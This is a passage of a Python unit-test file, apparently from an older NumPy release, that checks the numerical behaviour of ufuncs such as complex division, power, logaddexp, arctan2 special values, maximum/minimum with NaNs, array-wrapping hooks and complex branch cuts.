assert_equal(x / 100, [0, 0, 0, 1, -1, -1, -1, -1, -2])
assert_equal(x // 100, [0, 0, 0, 1, -1, -1, -1, -1, -2])
assert_equal(x % 100, [5, 10, 90, 0, 95, 90, 10, 0, 80])
def test_division_complex(self):
# check that implementation is correct
msg = "Complex division implementation check"
x = np.array([1. + 1.*1j, 1. + .5*1j, 1. + 2.*1j], dtype=np.complex128)
assert_almost_equal(x**2/x, x, err_msg=msg)
# check overflow, underflow
msg = "Complex division overflow/underflow check"
x = np.array([1.e+110, 1.e-110], dtype=np.complex128)
y = x**2/x
assert_almost_equal(y/x, [1, 1], err_msg=msg)
def test_floor_division_complex(self):
# check that implementation is correct
msg = "Complex floor division implementation check"
x = np.array([.9 + 1j, -.1 + 1j, .9 + .5*1j, .9 + 2.*1j], dtype=np.complex128)
y = np.array([0., -1., 0., 0.], dtype=np.complex128)
assert_equal(np.floor_divide(x**2,x), y, err_msg=msg)
# check overflow, underflow
msg = "Complex floor division overflow/underflow check"
x = np.array([1.e+110, 1.e-110], dtype=np.complex128)
y = np.floor_divide(x**2, x)
assert_equal(y, [1.e+110, 0], err_msg=msg)
class TestPower(TestCase):
def test_power_float(self):
x = np.array([1., 2., 3.])
assert_equal(x**0, [1., 1., 1.])
assert_equal(x**1, x)
assert_equal(x**2, [1., 4., 9.])
y = x.copy()
y **= 2
assert_equal(y, [1., 4., 9.])
assert_almost_equal(x**(-1), [1., 0.5, 1./3])
assert_almost_equal(x**(0.5), [1., ncu.sqrt(2), ncu.sqrt(3)])
def test_power_complex(self):
x = np.array([1+2j, 2+3j, 3+4j])
assert_equal(x**0, [1., 1., 1.])
assert_equal(x**1, x)
assert_almost_equal(x**2, [-3+4j, -5+12j, -7+24j])
assert_almost_equal(x**3, [(1+2j)**3, (2+3j)**3, (3+4j)**3])
assert_almost_equal(x**4, [(1+2j)**4, (2+3j)**4, (3+4j)**4])
assert_almost_equal(x**(-1), [1/(1+2j), 1/(2+3j), 1/(3+4j)])
assert_almost_equal(x**(-2), [1/(1+2j)**2, 1/(2+3j)**2, 1/(3+4j)**2])
assert_almost_equal(x**(-3), [(-11+2j)/125, (-46-9j)/2197,
(-117-44j)/15625])
assert_almost_equal(x**(0.5), [ncu.sqrt(1+2j), ncu.sqrt(2+3j),
ncu.sqrt(3+4j)])
norm = 1./((x**14)[0])
assert_almost_equal(x**14 * norm,
[i * norm for i in [-76443+16124j, 23161315+58317492j,
5583548873 + 2465133864j]])
# Ticket #836
def assert_complex_equal(x, y):
assert_array_equal(x.real, y.real)
assert_array_equal(x.imag, y.imag)
for z in [complex(0, np.inf), complex(1, np.inf)]:
err = np.seterr(invalid="ignore")
z = np.array([z], dtype=np.complex_)
try:
assert_complex_equal(z**1, z)
assert_complex_equal(z**2, z*z)
assert_complex_equal(z**3, z*z*z)
finally:
np.seterr(**err)
def test_power_zero(self):
# ticket #1271
zero = np.array([0j])
one = np.array([1+0j])
cinf = np.array([complex(np.inf, 0)])
cnan = np.array([complex(np.nan, np.nan)])
def assert_complex_equal(x, y):
x, y = np.asarray(x), np.asarray(y)
assert_array_equal(x.real, y.real)
assert_array_equal(x.imag, y.imag)
# positive powers
for p in [0.33, 0.5, 1, 1.5, 2, 3, 4, 5, 6.6]:
assert_complex_equal(np.power(zero, p), zero)
# zero power
assert_complex_equal(np.power(zero, 0), one)
assert_complex_equal(np.power(zero, 0+1j), cnan)
# negative power
for p in [0.33, 0.5, 1, 1.5, 2, 3, 4, 5, 6.6]:
assert_complex_equal(np.power(zero, -p), cnan)
assert_complex_equal(np.power(zero, -1+0.2j), cnan)
class TestLog2(TestCase):
def test_log2_values(self) :
x = [1, 2, 4, 8, 16, 32, 64, 128, 256, 512, 1024]
y = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
for dt in ['f','d','g'] :
xf = np.array(x, dtype=dt)
yf = np.array(y, dtype=dt)
assert_almost_equal(np.log2(xf), yf)
class TestExp2(TestCase):
def test_exp2_values(self) :
x = [1, 2, 4, 8, 16, 32, 64, 128, 256, 512, 1024]
y = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
for dt in ['f','d','g'] :
xf = np.array(x, dtype=dt)
yf = np.array(y, dtype=dt)
assert_almost_equal(np.exp2(yf), xf)
class TestLogAddExp2(object):
# Need test for intermediate precisions
def test_logaddexp2_values(self) :
x = [1, 2, 3, 4, 5]
y = [5, 4, 3, 2, 1]
z = [6, 6, 6, 6, 6]
for dt, dec in zip(['f','d','g'],[6, 15, 15]) :
xf = np.log2(np.array(x, dtype=dt))
yf = np.log2(np.array(y, dtype=dt))
zf = np.log2(np.array(z, dtype=dt))
assert_almost_equal(np.logaddexp2(xf, yf), zf, decimal=dec)
def test_logaddexp2_range(self) :
x = [1000000, -1000000, 1000200, -1000200]
y = [1000200, -1000200, 1000000, -1000000]
z = [1000200, -1000000, 1000200, -1000000]
for dt in ['f','d','g'] :
logxf = np.array(x, dtype=dt)
logyf = np.array(y, dtype=dt)
logzf = np.array(z, dtype=dt)
assert_almost_equal(np.logaddexp2(logxf, logyf), logzf)
def test_inf(self) :
err = np.seterr(invalid='ignore')
inf = np.inf
x = [inf, -inf, inf, -inf, inf, 1, -inf, 1]
y = [inf, inf, -inf, -inf, 1, inf, 1, -inf]
z = [inf, inf, inf, -inf, inf, inf, 1, 1]
try:
for dt in ['f','d','g'] :
logxf = np.array(x, dtype=dt)
logyf = np.array(y, dtype=dt)
logzf = np.array(z, dtype=dt)
assert_equal(np.logaddexp2(logxf, logyf), logzf)
finally:
np.seterr(**err)
def test_nan(self):
assert np.isnan(np.logaddexp2(np.nan, np.inf))
assert np.isnan(np.logaddexp2(np.inf, np.nan))
assert np.isnan(np.logaddexp2(np.nan, 0))
assert np.isnan(np.logaddexp2(0, np.nan))
assert np.isnan(np.logaddexp2(np.nan, np.nan))
class TestLog(TestCase):
def test_log_values(self) :
x = [1, 2, 4, 8, 16, 32, 64, 128, 256, 512, 1024]
y = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
for dt in ['f','d','g'] :
log2_ = 0.69314718055994530943
xf = np.array(x, dtype=dt)
yf = np.array(y, dtype=dt)*log2_
assert_almost_equal(np.log(xf), yf)
class TestExp(TestCase):
def test_exp_values(self) :
x = [1, 2, 4, 8, 16, 32, 64, 128, 256, 512, 1024]
y = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
for dt in ['f','d','g'] :
log2_ = 0.69314718055994530943
xf = np.array(x, dtype=dt)
yf = np.array(y, dtype=dt)*log2_
assert_almost_equal(np.exp(yf), xf)
class TestLogAddExp(object):
def test_logaddexp_values(self) :
x = [1, 2, 3, 4, 5]
y = [5, 4, 3, 2, 1]
z = [6, 6, 6, 6, 6]
for dt, dec in zip(['f','d','g'],[6, 15, 15]) :
xf = np.log(np.array(x, dtype=dt))
yf = np.log(np.array(y, dtype=dt))
zf = np.log(np.array(z, dtype=dt))
assert_almost_equal(np.logaddexp(xf, yf), zf, decimal=dec)
def test_logaddexp_range(self) :
x = [1000000, -1000000, 1000200, -1000200]
y = [1000200, -1000200, 1000000, -1000000]
z = [1000200, -1000000, 1000200, -1000000]
for dt in ['f','d','g'] :
logxf = np.array(x, dtype=dt)
logyf = np.array(y, dtype=dt)
logzf = np.array(z, dtype=dt)
assert_almost_equal(np.logaddexp(logxf, logyf), logzf)
def test_inf(self) :
err = np.seterr(invalid='ignore')
inf = np.inf
x = [inf, -inf, inf, -inf, inf, 1, -inf, 1]
y = [inf, inf, -inf, -inf, 1, inf, 1, -inf]
z = [inf, inf, inf, -inf, inf, inf, 1, 1]
try:
for dt in ['f','d','g'] :
logxf = np.array(x, dtype=dt)
logyf = np.array(y, dtype=dt)
logzf = np.array(z, dtype=dt)
assert_equal(np.logaddexp(logxf, logyf), logzf)
finally:
np.seterr(**err)
def test_nan(self):
assert np.isnan(np.logaddexp(np.nan, np.inf))
assert np.isnan(np.logaddexp(np.inf, np.nan))
assert np.isnan(np.logaddexp(np.nan, 0))
assert np.isnan(np.logaddexp(0, np.nan))
assert np.isnan(np.logaddexp(np.nan, np.nan))
class TestLog1p(TestCase):
def test_log1p(self):
assert_almost_equal(ncu.log1p(0.2), ncu.log(1.2))
assert_almost_equal(ncu.log1p(1e-6), ncu.log(1+1e-6))
class TestExpm1(TestCase):
def test_expm1(self):
assert_almost_equal(ncu.expm1(0.2), ncu.exp(0.2)-1)
assert_almost_equal(ncu.expm1(1e-6), ncu.exp(1e-6)-1)
class TestHypot(TestCase, object):
def test_simple(self):
assert_almost_equal(ncu.hypot(1, 1), ncu.sqrt(2))
assert_almost_equal(ncu.hypot(0, 0), 0)
def assert_hypot_isnan(x, y):
err = np.seterr(invalid='ignore')
try:
assert np.isnan(ncu.hypot(x, y)), "hypot(%s, %s) is %s, not nan" % (x, y, ncu.hypot(x, y))
finally:
np.seterr(**err)
def assert_hypot_isinf(x, y):
err = np.seterr(invalid='ignore')
try:
assert np.isinf(ncu.hypot(x, y)), "hypot(%s, %s) is %s, not inf" % (x, y, ncu.hypot(x, y))
finally:
np.seterr(**err)
class TestHypotSpecialValues(TestCase):
def test_nan_outputs(self):
assert_hypot_isnan(np.nan, np.nan)
assert_hypot_isnan(np.nan, 1)
def test_nan_outputs(self):
assert_hypot_isinf(np.nan, np.inf)
assert_hypot_isinf(np.inf, np.nan)
assert_hypot_isinf(np.inf, 0)
assert_hypot_isinf(0, np.inf)
def assert_arctan2_isnan(x, y):
assert np.isnan(ncu.arctan2(x, y)), "arctan(%s, %s) is %s, not nan" % (x, y, ncu.arctan2(x, y))
def assert_arctan2_ispinf(x, y):
assert (np.isinf(ncu.arctan2(x, y)) and ncu.arctan2(x, y) > 0), "arctan(%s, %s) is %s, not +inf" % (x, y, ncu.arctan2(x, y))
def assert_arctan2_isninf(x, y):
assert (np.isinf(ncu.arctan2(x, y)) and ncu.arctan2(x, y) < 0), "arctan(%s, %s) is %s, not -inf" % (x, y, ncu.arctan2(x, y))
def assert_arctan2_ispzero(x, y):
assert (ncu.arctan2(x, y) == 0 and not np.signbit(ncu.arctan2(x, y))), "arctan(%s, %s) is %s, not +0" % (x, y, ncu.arctan2(x, y))
def assert_arctan2_isnzero(x, y):
assert (ncu.arctan2(x, y) == 0 and np.signbit(ncu.arctan2(x, y))), "arctan(%s, %s) is %s, not -0" % (x, y, ncu.arctan2(x, y))
class TestArctan2SpecialValues(TestCase):
def test_one_one(self):
# atan2(1, 1) returns pi/4.
assert_almost_equal(ncu.arctan2(1, 1), 0.25 * np.pi)
assert_almost_equal(ncu.arctan2(-1, 1), -0.25 * np.pi)
assert_almost_equal(ncu.arctan2(1, -1), 0.75 * np.pi)
def test_zero_nzero(self):
# atan2(+-0, -0) returns +-pi.
assert_almost_equal(ncu.arctan2(np.PZERO, np.NZERO), np.pi)
assert_almost_equal(ncu.arctan2(np.NZERO, np.NZERO), -np.pi)
def test_zero_pzero(self):
# atan2(+-0, +0) returns +-0.
assert_arctan2_ispzero(np.PZERO, np.PZERO)
assert_arctan2_isnzero(np.NZERO, np.PZERO)
def test_zero_negative(self):
# atan2(+-0, x) returns +-pi for x < 0.
assert_almost_equal(ncu.arctan2(np.PZERO, -1), np.pi)
assert_almost_equal(ncu.arctan2(np.NZERO, -1), -np.pi)
def test_zero_positive(self):
# atan2(+-0, x) returns +-0 for x > 0.
assert_arctan2_ispzero(np.PZERO, 1)
assert_arctan2_isnzero(np.NZERO, 1)
def test_positive_zero(self):
# atan2(y, +-0) returns +pi/2 for y > 0.
assert_almost_equal(ncu.arctan2(1, np.PZERO), 0.5 * np.pi)
assert_almost_equal(ncu.arctan2(1, np.NZERO), 0.5 * np.pi)
def test_negative_zero(self):
# atan2(y, +-0) returns -pi/2 for y < 0.
assert_almost_equal(ncu.arctan2(-1, np.PZERO), -0.5 * np.pi)
assert_almost_equal(ncu.arctan2(-1, np.NZERO), -0.5 * np.pi)
def test_any_ninf(self):
# atan2(+-y, -infinity) returns +-pi for finite y > 0.
assert_almost_equal(ncu.arctan2(1, np.NINF), np.pi)
assert_almost_equal(ncu.arctan2(-1, np.NINF), -np.pi)
def test_any_pinf(self):
# atan2(+-y, +infinity) returns +-0 for finite y > 0.
assert_arctan2_ispzero(1, np.inf)
assert_arctan2_isnzero(-1, np.inf)
def test_inf_any(self):
# atan2(+-infinity, x) returns +-pi/2 for finite x.
assert_almost_equal(ncu.arctan2( np.inf, 1), 0.5 * np.pi)
assert_almost_equal(ncu.arctan2(-np.inf, 1), -0.5 * np.pi)
def test_inf_ninf(self):
# atan2(+-infinity, -infinity) returns +-3*pi/4.
assert_almost_equal(ncu.arctan2( np.inf, -np.inf), 0.75 * np.pi)
assert_almost_equal(ncu.arctan2(-np.inf, -np.inf), -0.75 * np.pi)
def test_inf_pinf(self):
# atan2(+-infinity, +infinity) returns +-pi/4.
assert_almost_equal(ncu.arctan2( np.inf, np.inf), 0.25 * np.pi)
assert_almost_equal(ncu.arctan2(-np.inf, np.inf), -0.25 * np.pi)
def test_nan_any(self):
# atan2(nan, x) returns nan for any x, including inf
assert_arctan2_isnan(np.nan, np.inf)
assert_arctan2_isnan(np.inf, np.nan)
assert_arctan2_isnan(np.nan, np.nan)
class TestLdexp(TestCase):
def _check_ldexp(self, tp):
assert_almost_equal(ncu.ldexp(np.array(2., np.float32),
np.array(3, tp)), 16.)
assert_almost_equal(ncu.ldexp(np.array(2., np.float64),
np.array(3, tp)), 16.)
assert_almost_equal(ncu.ldexp(np.array(2., np.longdouble),
np.array(3, tp)), 16.)
def test_ldexp(self):
# The default Python int type should work
assert_almost_equal(ncu.ldexp(2., 3), 16.)
# The following int types should all be accepted
self._check_ldexp(np.int8)
self._check_ldexp(np.int16)
self._check_ldexp(np.int32)
self._check_ldexp('i')
self._check_ldexp('l')
@dec.knownfailureif(sys.platform == 'win32' and sys.version_info < (2, 6),
"python.org < 2.6 binaries have broken ldexp in the "
"C runtime")
def test_ldexp_overflow(self):
# silence warning emitted on overflow
err = np.seterr(over="ignore")
try:
imax = np.iinfo(np.dtype('l')).max
imin = np.iinfo(np.dtype('l')).min
assert_equal(ncu.ldexp(2., imax), np.inf)
assert_equal(ncu.ldexp(2., imin), 0)
finally:
np.seterr(**err)
class TestMaximum(TestCase):
def test_reduce(self):
dflt = np.typecodes['AllFloat']
dint = np.typecodes['AllInteger']
seq1 = np.arange(11)
seq2 = seq1[::-1]
func = np.maximum.reduce
for dt in dint:
tmp1 = seq1.astype(dt)
tmp2 = seq2.astype(dt)
assert_equal(func(tmp1), 10)
assert_equal(func(tmp2), 10)
for dt in dflt:
tmp1 = seq1.astype(dt)
tmp2 = seq2.astype(dt)
assert_equal(func(tmp1), 10)
assert_equal(func(tmp2), 10)
tmp1[::2] = np.nan
tmp2[::2] = np.nan
assert_equal(func(tmp1), np.nan)
assert_equal(func(tmp2), np.nan)
def test_reduce_complex(self):
assert_equal(np.maximum.reduce([1,2j]),1)
assert_equal(np.maximum.reduce([1+3j,2j]),1+3j)
def test_float_nans(self):
nan = np.nan
arg1 = np.array([0, nan, nan])
arg2 = np.array([nan, 0, nan])
out = np.array([nan, nan, nan])
assert_equal(np.maximum(arg1, arg2), out)
def test_complex_nans(self):
nan = np.nan
for cnan in [complex(nan, 0), complex(0, nan), complex(nan, nan)] :
arg1 = np.array([0, cnan, cnan], dtype=np.complex)
arg2 = np.array([cnan, 0, cnan], dtype=np.complex)
out = np.array([nan, nan, nan], dtype=np.complex)
assert_equal(np.maximum(arg1, arg2), out)
class TestMinimum(TestCase):
def test_reduce(self):
dflt = np.typecodes['AllFloat']
dint = np.typecodes['AllInteger']
seq1 = np.arange(11)
seq2 = seq1[::-1]
func = np.minimum.reduce
for dt in dint:
tmp1 = seq1.astype(dt)
tmp2 = seq2.astype(dt)
assert_equal(func(tmp1), 0)
assert_equal(func(tmp2), 0)
for dt in dflt:
tmp1 = seq1.astype(dt)
tmp2 = seq2.astype(dt)
assert_equal(func(tmp1), 0)
assert_equal(func(tmp2), 0)
tmp1[::2] = np.nan
tmp2[::2] = np.nan
assert_equal(func(tmp1), np.nan)
assert_equal(func(tmp2), np.nan)
def test_reduce_complex(self):
assert_equal(np.minimum.reduce([1,2j]),2j)
assert_equal(np.minimum.reduce([1+3j,2j]),2j)
def test_float_nans(self):
nan = np.nan
arg1 = np.array([0, nan, nan])
arg2 = np.array([nan, 0, nan])
out = np.array([nan, nan, nan])
assert_equal(np.minimum(arg1, arg2), out)
def test_complex_nans(self):
nan = np.nan
for cnan in [complex(nan, 0), complex(0, nan), complex(nan, nan)] :
arg1 = np.array([0, cnan, cnan], dtype=np.complex)
arg2 = np.array([cnan, 0, cnan], dtype=np.complex)
out = np.array([nan, nan, nan], dtype=np.complex)
assert_equal(np.minimum(arg1, arg2), out)
class TestFmax(TestCase):
def test_reduce(self):
dflt = np.typecodes['AllFloat']
dint = np.typecodes['AllInteger']
seq1 = np.arange(11)
seq2 = seq1[::-1]
func = np.fmax.reduce
for dt in dint:
tmp1 = seq1.astype(dt)
tmp2 = seq2.astype(dt)
assert_equal(func(tmp1), 10)
assert_equal(func(tmp2), 10)
for dt in dflt:
tmp1 = seq1.astype(dt)
tmp2 = seq2.astype(dt)
assert_equal(func(tmp1), 10)
assert_equal(func(tmp2), 10)
tmp1[::2] = np.nan
tmp2[::2] = np.nan
assert_equal(func(tmp1), 9)
assert_equal(func(tmp2), 9)
def test_reduce_complex(self):
assert_equal(np.fmax.reduce([1,2j]),1)
assert_equal(np.fmax.reduce([1+3j,2j]),1+3j)
def test_float_nans(self):
nan = np.nan
arg1 = np.array([0, nan, nan])
arg2 = np.array([nan, 0, nan])
out = np.array([0, 0, nan])
assert_equal(np.fmax(arg1, arg2), out)
def test_complex_nans(self):
nan = np.nan
for cnan in [complex(nan, 0), complex(0, nan), complex(nan, nan)] :
arg1 = np.array([0, cnan, cnan], dtype=np.complex)
arg2 = np.array([cnan, 0, cnan], dtype=np.complex)
out = np.array([0, 0, nan], dtype=np.complex)
assert_equal(np.fmax(arg1, arg2), out)
class TestFmin(TestCase):
def test_reduce(self):
dflt = np.typecodes['AllFloat']
dint = np.typecodes['AllInteger']
seq1 = np.arange(11)
seq2 = seq1[::-1]
func = np.fmin.reduce
for dt in dint:
tmp1 = seq1.astype(dt)
tmp2 = seq2.astype(dt)
assert_equal(func(tmp1), 0)
assert_equal(func(tmp2), 0)
for dt in dflt:
tmp1 = seq1.astype(dt)
tmp2 = seq2.astype(dt)
assert_equal(func(tmp1), 0)
assert_equal(func(tmp2), 0)
tmp1[::2] = np.nan
tmp2[::2] = np.nan
assert_equal(func(tmp1), 1)
assert_equal(func(tmp2), 1)
def test_reduce_complex(self):
assert_equal(np.fmin.reduce([1,2j]),2j)
assert_equal(np.fmin.reduce([1+3j,2j]),2j)
def test_float_nans(self):
nan = np.nan
arg1 = np.array([0, nan, nan])
arg2 = np.array([nan, 0, nan])
out = np.array([0, 0, nan])
assert_equal(np.fmin(arg1, arg2), out)
def test_complex_nans(self):
nan = np.nan
for cnan in [complex(nan, 0), complex(0, nan), complex(nan, nan)] :
arg1 = np.array([0, cnan, cnan], dtype=np.complex)
arg2 = np.array([cnan, 0, cnan], dtype=np.complex)
out = np.array([0, 0, nan], dtype=np.complex)
assert_equal(np.fmin(arg1, arg2), out)
class TestFloatingPoint(TestCase):
def test_floating_point(self):
assert_equal(ncu.FLOATING_POINT_SUPPORT, 1)
class TestDegrees(TestCase):
def test_degrees(self):
assert_almost_equal(ncu.degrees(np.pi), 180.0)
assert_almost_equal(ncu.degrees(-0.5*np.pi), -90.0)
class TestRadians(TestCase):
def test_radians(self):
assert_almost_equal(ncu.radians(180.0), np.pi)
assert_almost_equal(ncu.radians(-90.0), -0.5*np.pi)
class TestSign(TestCase):
def test_sign(self):
a = np.array([np.inf, -np.inf, np.nan, 0.0, 3.0, -3.0])
out = np.zeros(a.shape)
tgt = np.array([1., -1., np.nan, 0.0, 1.0, -1.0])
olderr = np.seterr(invalid='ignore')
try:
res = ncu.sign(a)
assert_equal(res, tgt)
res = ncu.sign(a, out)
assert_equal(res, tgt)
assert_equal(out, tgt)
finally:
np.seterr(**olderr)
class TestSpecialMethods(TestCase):
def test_wrap(self):
class with_wrap(object):
def __array__(self):
return np.zeros(1)
def __array_wrap__(self, arr, context):
r = with_wrap()
r.arr = arr
r.context = context
return r
a = with_wrap()
x = ncu.minimum(a, a)
assert_equal(x.arr, np.zeros(1))
func, args, i = x.context
self.assertTrue(func is ncu.minimum)
self.assertEqual(len(args), 2)
assert_equal(args[0], a)
assert_equal(args[1], a)
self.assertEqual(i, 0)
def test_wrap_with_iterable(self):
# test fix for bug #1026:
class with_wrap(np.ndarray):
__array_priority__ = 10
def __new__(cls):
return np.asarray(1).view(cls).copy()
def __array_wrap__(self, arr, context):
return arr.view(type(self))
a = with_wrap()
x = ncu.multiply(a, (1, 2, 3))
self.assertTrue(isinstance(x, with_wrap))
assert_array_equal(x, np.array((1, 2, 3)))
def test_priority_with_scalar(self):
# test fix for bug #826:
class A(np.ndarray):
__array_priority__ = 10
def __new__(cls):
return np.asarray(1.0, 'float64').view(cls).copy()
a = A()
x = np.float64(1)*a
self.assertTrue(isinstance(x, A))
assert_array_equal(x, np.array(1))
def test_old_wrap(self):
class with_wrap(object):
def __array__(self):
return np.zeros(1)
def __array_wrap__(self, arr):
r = with_wrap()
r.arr = arr
return r
a = with_wrap()
x = ncu.minimum(a, a)
assert_equal(x.arr, np.zeros(1))
def test_priority(self):
class A(object):
def __array__(self):
return np.zeros(1)
def __array_wrap__(self, arr, context):
r = type(self)()
r.arr = arr
r.context = context
return r
class B(A):
__array_priority__ = 20.
class C(A):
__array_priority__ = 40.
x = np.zeros(1)
a = A()
b = B()
c = C()
f = ncu.minimum
self.assertTrue(type(f(x,x)) is np.ndarray)
self.assertTrue(type(f(x,a)) is A)
self.assertTrue(type(f(x,b)) is B)
self.assertTrue(type(f(x,c)) is C)
self.assertTrue(type(f(a,x)) is A)
self.assertTrue(type(f(b,x)) is B)
self.assertTrue(type(f(c,x)) is C)
self.assertTrue(type(f(a,a)) is A)
self.assertTrue(type(f(a,b)) is B)
self.assertTrue(type(f(b,a)) is B)
self.assertTrue(type(f(b,b)) is B)
self.assertTrue(type(f(b,c)) is C)
self.assertTrue(type(f(c,b)) is C)
self.assertTrue(type(f(c,c)) is C)
self.assertTrue(type(ncu.exp(a) is A))
self.assertTrue(type(ncu.exp(b) is B))
self.assertTrue(type(ncu.exp(c) is C))
def test_failing_wrap(self):
class A(object):
def __array__(self):
return np.zeros(1)
def __array_wrap__(self, arr, context):
raise RuntimeError
a = A()
self.assertRaises(RuntimeError, ncu.maximum, a, a)
def test_default_prepare(self):
class with_wrap(object):
__array_priority__ = 10
def __array__(self):
return np.zeros(1)
def __array_wrap__(self, arr, context):
return arr
a = with_wrap()
x = ncu.minimum(a, a)
assert_equal(x, np.zeros(1))
assert_equal(type(x), np.ndarray)
def test_prepare(self):
class with_prepare(np.ndarray):
__array_priority__ = 10
def __array_prepare__(self, arr, context):
# make sure we can return a new
return np.array(arr).view(type=with_prepare)
a = np.array(1).view(type=with_prepare)
x = np.add(a, a)
assert_equal(x, np.array(2))
assert_equal(type(x), with_prepare)
def test_failing_prepare(self):
class A(object):
def __array__(self):
return np.zeros(1)
def __array_prepare__(self, arr, context=None):
raise RuntimeError
a = A()
self.assertRaises(RuntimeError, ncu.maximum, a, a)
def test_array_with_context(self):
class A(object):
def __array__(self, dtype=None, context=None):
func, args, i = context
self.func = func
self.args = args
self.i = i
return np.zeros(1)
class B(object):
def __array__(self, dtype=None):
return np.zeros(1, dtype)
class C(object):
def __array__(self):
return np.zeros(1)
a = A()
ncu.maximum(np.zeros(1), a)
self.assertTrue(a.func is ncu.maximum)
assert_equal(a.args[0], 0)
self.assertTrue(a.args[1] is a)
self.assertTrue(a.i == 1)
assert_equal(ncu.maximum(a, B()), 0)
assert_equal(ncu.maximum(a, C()), 0)
class TestChoose(TestCase):
def test_mixed(self):
c = np.array([True,True])
a = np.array([True,True])
assert_equal(np.choose(c, (a, 1)), np.array([1,1]))
def is_longdouble_finfo_bogus():
info = np.finfo(np.longcomplex)
return not np.isfinite(np.log10(info.tiny/info.eps))
class TestComplexFunctions(object):
funcs = [np.arcsin, np.arccos, np.arctan, np.arcsinh, np.arccosh,
np.arctanh, np.sin, np.cos, np.tan, np.exp,
np.exp2, np.log, np.sqrt, np.log10, np.log2,
np.log1p]
def test_it(self):
for f in self.funcs:
if f is np.arccosh :
x = 1.5
else :
x = .5
fr = f(x)
fz = f(np.complex(x))
assert_almost_equal(fz.real, fr, err_msg='real part %s'%f)
assert_almost_equal(fz.imag, 0., err_msg='imag part %s'%f)
def test_precisions_consistent(self) :
z = 1 + 1j
for f in self.funcs :
fcf = f(np.csingle(z))
fcd = f(np.cdouble(z))
fcl = f(np.clongdouble(z))
assert_almost_equal(fcf, fcd, decimal=6, err_msg='fch-fcd %s'%f)
assert_almost_equal(fcl, fcd, decimal=15, err_msg='fch-fcl %s'%f)
def test_branch_cuts(self):
# check branch cuts and continuity on them
yield _check_branch_cut, np.log, -0.5, 1j, 1, -1
yield _check_branch_cut, np.log2, -0.5, 1j, 1, -1
yield _check_branch_cut, np.log10, -0.5, 1j, 1, -1
yield _check_branch_cut, np.log1p, -1.5, 1j, 1, -1
yield _check_branch_cut, np.sqrt, -0.5, 1j, 1, -1
yield _check_branch_cut, np.arcsin, [ -2, 2], [1j, -1j], 1, -1
yield _check_branch_cut, np.arccos, [ -2, 2], [1j, -1j], 1, -1
yield _check_branch_cut, np.arctan, [-2j, 2j], [1, -1 ], -1, 1
yield _check_branch_cut, np.arcsinh, [-2j, 2j], [-1, 1], -1, 1
yield _check_branch_cut, np.arccosh, [ -1, 0.5], [1j, 1j], 1, -1
yield _check_branch_cut, np.arctanh, [ -2, 2], [1j, -1j], 1, -1
# check against bogus branch cuts: assert continuity between quadrants
yield _check_branch_cut, np.arcsin, [-2j, 2j], [ 1, 1], 1, 1
yield _check_branch_cut, np.arccos, [-2j, 2j], [ 1, 1], 1, 1
yield _check_branch_cut, np.arctan, [ -2, 2], [1j, 1j], 1, 1
yield _check_branch_cut, np.arcsinh, [ -2, 2, 0], [1j, 1j, 1 ], 1, 1
yield _check_branch_cut, np.arccosh, [-2j, 2j, 2], [1, 1, 1j], 1, 1
yield _check_branch_cut, np.arctanh, [-2j, 2j, 0], [1, 1, 1j], 1, 1
@dec.knownfailureif(True, "These branch cuts are known to fail")
def test_branch_cuts_failing(self):
# XXX: signed zero not OK with ICC on 64-bit platform for log, see
# http://permalink.gmane.org/gmane.comp.python.numeric.general/25335
yield _check_branch_cut, np.log, -0.5, 1j, 1, -1, True
yield _check_branch_cut, np.log2, -0.5, 1j, 1, -1, True
yield _check_branch_cut, np.log10, -0.5, 1j, 1, -1, True
yield _check_branch_cut, np.log1p, -1.5, 1j, 1, -1, True
# XXX: signed zeros are not OK for sqrt or for the arc* functions
yield _check_branch_cut, np.sqrt, -0.5, 1j, 1, -1, True
yield _check_branch_cut, np.arcsin, [ -2, 2], [1j, -1j], 1, -1, True
yield _check_branch_cut, np.arccos, [ -2, 2], [1j, -1j], 1, -1, True
yield _check_branch_cut, np.arctan, [-2j, 2j], [1, -1 ], -1, 1, True
yield _check_branch_cut, np.arcsinh, [-2j, 2j], [-1, 1], -1, 1, True
yield _check_branch_cut, np.arccosh, [ -1, 0.5], [1j, 1j], 1, -1, True
yield _check_branch_cut, np.arctanh, [ -2, 2], [1j, -1j], 1, -1, True
def test_against_cmath(self):
import cmath, sys
# cmath.asinh is broken in some versions of Python, see
# http://bugs.python.org/issue1381
broken_cmath_asinh = False
if sys.version_info < (2,6):
broken_cmath_asinh = True
points = [-1-1j, -1+1j, +1-1j, +1+1j]
name_map = {'arcsin': 'asin', 'arccos': 'acos', 'arctan': 'atan',
'arcsinh': 'asinh', 'arccosh': 'acosh', 'arctanh': 'atanh'}
atol = 4*np.finfo(np.complex).eps
for func in self.funcs:
fname = func.__name__.split('.')[-1]
cname = name_map.get(fname, fname)
try:
cfunc = getattr(cmath, cname)
except AttributeError:
continue
for p in points:
a = complex(func(np.complex_(p)))
b = cfunc(p)
if cname == 'asinh' and broken_cmath_asinh:
continue
assert abs(a - b) < atol, "%s %s: %s; cmath: %s"%(fname,p,a,b)
def check_loss_of_precision(self, dtype):
"""Check loss of precision in complex arc* functions"""
# Check against known-good functions
info = np.finfo(dtype)
real_dtype = dtype(0.).real.dtype
eps = info.eps
def check(x, rtol):
x = x.astype(real_dtype)
z = x.astype(dtype)
d = np.absolute(np.arcsinh(x)/np.arcsinh(z).real - 1)
assert np.all(d < rtol), (np.argmax(d), x[np.argmax(d)], d.max(),
'arcsinh')
z = (1j*x).astype(dtype)
d = np.absolute(np.arcsinh(x)/np.arcsin(z).imag - 1)
assert np.all(d < rtol), (np.argmax(d), x[np.argmax(d)], d.max(),
'arcsin')
z = x.astype(dtype)
d = np.absolute(np.arctanh(x)/np.arctanh(z).real - 1)
assert np.all(d < rtol), (np.argmax(d), x[np.argmax(d)], d.max(),
'arctanh')
z = (1j*x).astype(dtype)
d = np.absolute(np.arctanh(x)/np.arctan(z).imag - 1)
assert np.all(d < rtol), (np.argmax(d), x[np.argmax(d)], d.max(),
'arctan')
# The switchover was chosen as 1e-3; hence there can be up to
# ~eps/1e-3 of relative cancellation error before it
x_series = np.logspace(-20, -3.001, 200)
x_basic = np.logspace(-2.999, 0, 10, endpoint=False)
if dtype is np.longcomplex:
# It's not guaranteed that the system-provided arc functions
# are accurate down to a few epsilons. (Eg. on Linux 64-bit)
# So, give more leeway for long complex tests here:
check(x_series, 50*eps)
else:
check(x_series, 2*eps)
